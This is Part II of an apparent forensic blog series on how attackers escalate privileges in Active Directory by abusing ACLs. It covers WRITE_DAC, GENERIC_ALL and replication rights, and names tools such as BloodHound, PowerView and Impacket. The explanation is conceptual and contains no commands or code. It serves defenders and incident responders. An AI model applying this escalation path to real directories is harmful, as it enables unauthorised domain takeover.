Active Directory permission structure as an attack vector – a forensic analysis, Part II

The fundamentals of access control in Active Directory outlined in Part I of this series demonstrate how finely graded and, at the same time, how difficult to grasp the permissions within the system are. In practice, this results in a structure that is not vulnerable to individual misconfigurations, but rather to the interplay of established permission relationships. The following section examines how these mechanisms can be specifically exploited to gradually gain extended permissions by manipulating Access Control Lists (ACLs), and the technical processes underlying this procedure.

Side note: Typical phases of a cyber attack

Cyber attacks generally follow a structured sequence that can be divided into several successive phases. The phases of such an attack have already been discussed in another article. Below, the ‘privilege escalation’ phase of the attack is examined in more detail. Here, existing rights are specifically expanded to achieve higher levels of access. Methods and means are outlined for how, through targeted manipulation of Access Control Entries (ACE), an expansion to privileged rights is possible.

From restricted access to systematic escalation

In Active Directory environments, the expansion of rights in practice usually takes the form of a multi-stage process rather than a clearly defined attack step. The starting point is often an account that already appears legitimate, which is gradually used to achieve higher permissions via various intermediate stages. What is crucial here is not so much a single exploit as the skilful combination of suitable objects, permissions and inheritance mechanisms within the environment.

Assuming that attackers have already gained access to the system (initial access) and compromised an AD account[1], a typical attack scenario would not begin with the aim of immediately gaining administrative control, but rather with the systematic analysis of the effective permissions already available to the compromised user account. The starting point is usually notan account with privileged access, but a regular user account.

The focus of this approach is not on circumventing security mechanisms, but on their consistent use. Active Directory’s access control mechanisms are designed to enable flexible delegation. However, it is precisely this flexibility that creates vulnerabilities. ACL-based permission extensions do not follow a random pattern but are based on a precise understanding of the underlying mechanisms. They are less the result of individual misconfigurations and more the result of cumulative effects within established permission structures. A key feature of such attack paths is their exploitation of legitimate system mechanisms. Rather than bypassing security checks, attackers operate within the intended authorisation model. As a result, whilst their actions comply with system protocols, they simultaneously make detection and forensic analysis more difficult.

Analysis of effective permissions

The first step in such a scenario is the systematic analysis of existing permissions. What is crucial here are not formal roles or group memberships, but the actual effective rights of an account. These result from the combination of direct access rights, nested group memberships and inherited permissions along the directory structure.

In practice, specialised tools such as BloodHound are used in conjunction with SharpHound to carry out this analysis. They collect extensive information about objects and their relationships and present this in the form of a graph. This makes it possible to identify even complex dependencies and multi-level escalation paths that are scarcely visible in traditional administration tools. By analysing security descriptors and the Access Control Entries[2] they contain, it is possible to specifically identify objects on which partial modification rights of higher-level AD objects already exist. 

For example, a user who does not have an obvious administrator account may nevertheless possess rights that allow them to perform critical actions. In particular, rights such as WRITE_DAC, WRITE_OWNER[3] or object-specific modification rights on group objects enable escalations without the need for privileged group memberships.

These scenarios frequently arise in the context of delegated administration and are difficult to fully grasp in complex environments. It is precisely these hard-to-trace permission combinations that form the basis for subsequent escalation steps.
 

Targeted manipulation of access control lists

Once a suitable target object has been identified – for example, a group over which the compromised account holds certain modification or write rights – the actual manipulation of access control takes place. This involves the targeted extension of the object’s Discretionary Access Control List (DACL) by adding a new access control entry. This grants the attacking account additional rights to the object, such as the ability to further modify permissions or alter security-relevant attributes.

Technically, this is a standard administrative operation. The change is made via existing interfaces and fully complies with the intended permission model. Its impact is, however, significant, as even a single, specifically set permission can be sufficient to permanently extend control over an object.

Specifically, the WRITE_DAC right on an object can be used as a technical entry point. This right allows the DACL of an object to be modified. This does not immediately grant the attacker administrative control, but it does give them the ability to influence the access control rules themselves.

Alternatively, the attacker can also obtain GENERIC_WRITE or GENERIC_ALL on a target object. These combinations of rights are often granted to simplify administrative tasks without fully reflecting their implications. In practice, they can allow sensitive attributes to be modified or permission structures to be taken over entirely.

For the practical implementation of these changes, PowerShell-based frameworks such as PowerView are frequently used, which abstract access to AD objects and their security descriptors. In addition, native interfaces or libraries can also be used, such as those implemented in the tool Impacket , to make changes via network protocols.

Cascading privilege escalation

The initial ACL manipulation is generally not the end goal, but rather the starting point for further escalation. The newly acquired rights are used to establish additional permissions, which in turn enable access to more sensitive objects. This process takes place step by step and builds upon each other.

A characteristic feature of this is that each individual action appears legitimate in its own way. It is only when taken as a whole that an escalation path emerges, which can lead to complete administrative control.

Inheritance as a structural amplifier

A key factor in the effectiveness of such attacks is the inheritance of permissions. Rights set on higher-level structures such as organisational units (OUs) can automatically affect a large number of subordinate objects. This significantly increases the scope of a single manipulation.

This mechanism means that cause and effect can be spatially separated. A change made at a central point only takes effect on downstream objects, which makes both detection and analysis considerably more difficult. In complex directory structures, this can result in permission states whose origin can only be traced with considerable analytical effort.

Abuse of Extended Rights

A particularly effective but less obvious mechanism is the abuse of extended rights. These rights are technically implemented as special ACEs, which are referenced via GUID[4](s). They permit operations that cannot be achieved using simple read or write permissions.

A prominent example is replication rights. If an attacker is granted such an extended right, they may be able to replicate directory data and thereby gain access to highly sensitive information. The technical implementation of these rights is complex, and their significance is not always clearly apparent in administrative interfaces.

Tools and technical implementation

The practical implementation of such scenarios is made considerably easier by specialised tools. These enable the analysis of complex permission structures, the calculation of effective attack vectors, and the targeted modification of rights accordingly. In particular, the visualisation of dependencies and escalation paths in the form of graphs (see Figure 1) helps to identify relevant attack vectors even in large-scale environments.

By abstracting the underlying binary structures, the manipulation of access control lists is transformed into a form that is operationally usable. The technical hurdle therefore lies less in implementing individual changes and more in understanding the underlying authorisation logic and its interactions.

Figure 1: Graphical representation of permission structures

Forensic traces and limitations of logging

Changes to access control lists and security-relevant objects generally leave traces in the event logs of the domain controllers. These include, amongst other things, adjustments to permissions, changes to group memberships, and administrative interventions in security-critical structures.

In practice, however, it is evident that this information is often of limited use. Many relevant events are not recorded without specific configuration of the audit policies. At the same time, individual entries get lost in the normal volume of operations and are difficult to evaluate in isolation. Only by correlating multiple events over an extended period is it possible to identify patterns that indicate a gradual escalation of privileges. In practice, the traceability of attacks is often severely limited. A key reason for this is the frequently insufficient size of event logs, which are also rather limited by default in Microsoft systems. This quickly leads to log data rotation, meaning that relevant time periods are overwritten after a short time and important traces of an attack are lost.

Classification: Structure rather than vulnerability

The combined picture reveals a clear but technically sophisticated attack pattern: an attacker first gains minimal privileges, uses these for strategic analysis and selective modification of access controls, escalates through several stages to administrative privileges, and in doing so leaves artefacts in various data sources that can only be identified through targeted analysis.

It is precisely this interplay of systematic permission analyses, ACL modifications, inheritance mechanisms and audit events that makes privilege escalation via ACL structures an elusive yet relevant phenomenon for incident response and forensics.

Outlook

In the next part, the forensic perspective will be explored in greater depth. The focus will be on whether and how the manipulations described can be concretely proven, which artefacts can be used for this purpose, and how the attack pattern can be reconstructed from fragmented traces.

[4] In the Microsoft environment, a GUID (Globally Unique Identifier) is a 128-bit number that serves as a unique identifier for an object.